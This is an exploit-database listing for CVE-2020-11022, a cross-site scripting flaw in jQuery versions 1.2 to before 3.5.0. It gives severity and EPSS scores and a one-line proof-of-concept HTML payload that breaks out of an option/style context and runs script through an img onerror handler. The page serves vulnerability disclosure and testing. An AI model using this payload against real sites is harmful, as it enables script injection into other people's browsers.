Advertisement






jQuery 1.2 Cross Site Scripting

CVE Category Price Severity
CVE-2020-11022 CWE-79 Exploit not for sale Medium
Author Risk Exploitation Type Date
Unknown High Remote 2021-04-15
CVSS EPSS EPSSP
Not specified in the provided URL 0.043 0.61767

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040081

Below is a copy:

jQuery 1.2 Cross Site Scripting
# Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS)
# Date: 04/29/2020
# Exploit Author: Central InfoSec
# Version: jQuery versions greater than or equal to 1.2 and before 3.5.0
# CVE : CVE-2020-11022

# Proof of Concept 1:
<option><style></option></select><img src=x onerror=alert(1)></style>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum